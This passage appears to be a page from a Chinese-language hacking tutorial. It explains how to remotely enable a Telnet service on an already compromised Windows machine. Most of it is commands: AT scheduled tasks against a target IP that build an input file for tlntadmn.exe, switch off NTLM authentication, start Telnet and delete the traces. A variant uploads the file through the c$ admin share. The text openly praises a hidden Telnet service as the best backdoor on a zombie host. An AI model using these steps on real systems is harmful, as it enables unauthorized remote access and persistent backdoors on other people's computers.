方法2:利用脚本修改Tlntadmn:

有时我们出于特殊原因不要求立即停止Telnet服务或是变更NTLM模式,这时我们必须借助AT命令:at \\IP time 程序名,但实际上操作的话我们会发现:类似tlntadmn这样的程序是控制台的一个交互式工具,其参数设置并不能很好的被AT命令所调用,我们应如何处理呢?换句话说在没有3389等远程登陆的模式下,如何给方便的给对方开启Telnet服务呢?我们可以将命令写入一个txt文件,再加以调用.写入的命令请按照下面的顺序:

停止服务(5)->更改设置(3)->NTLM(7)->确认更改(y)->修改NTLM当前值(0)->再次确认(y)->退出菜单(0)->启动服务(4)->退出程序(0)

在方法1中我们知道在每个选择后面都要回车确认运行,所以我们要模拟操作写入的数据应是:

5(回车)3(回车)7(回车)y(回车)0(回车)y(回车)0(回车)4(回车)0(回车)

现在我们有二种思路接下去做:一是直接在被入侵机器的CMD上制作txt文件以供调用;二是在本地生成txt再上传到被入侵机器以供调用.

下面我们看他们分别是如何实现的:

1.直接在被入侵机器的CMD上制作txt文件以供调用.依次在cmd下如此运行命令:

  1. at \\ip time "echo 5 > c:\Telnet.txt"  
  2. at \\ip time "echo 3 >> c:\Telnet.txt"  
  3. at \\ip time "echo 7 >> c:\Telnet.txt"  
  4. at \\ip time "echo y >> c:\Telnet.txt"  
  5. at \\ip time "echo 0 >> c:\Telnet.txt"  
  6. at \\ip time "echo y >> c:\Telnet.txt"  
  7. at \\ip time "echo 0 >> c:\Telnet.txt"  
  8. at \\ip time "echo 4 >> c:\Telnet.txt"  
  9. at \\ip time "echo 0 >> c:\Telnet.txt"  
  10. at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\Telnet.txt"  
  11. at \\ip time "del c:\Telnet.txt /f" 

只须按上面的命令行一行行打入运行就可以了.效果与方法1是等同的.

2.在本地生成txt再上传到被入侵机器以供调用.在本地机器上做一个Telnet.txt文件,内容如下:

5 3 7 y 0 y 0 4 0

注意每一行都要加回车,然后将这个文件上传到被入侵机器的C:盘下:

copy Telnet.txt \\ip\c$

再设置在某时间内启动并删除巳上传文件: at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\Telnet.txt" at \\ip time "del c:\Telnet.txt /f"

很简单的dos管道重定向原理,这样就完成tlntadmn的交互过程.效果与方法A是等同的,简单那吧?

Tlntadmn在处理Telnet上显得异常强大,在入侵过程中如果能熟练应用它,那么开放Telnet服务将显得轻而易举,当然,隐蔽的Telnet服务也就是肉鸡上最好的后门了!你学会了吗?
 


共2页: 上一页12下一页

相关内容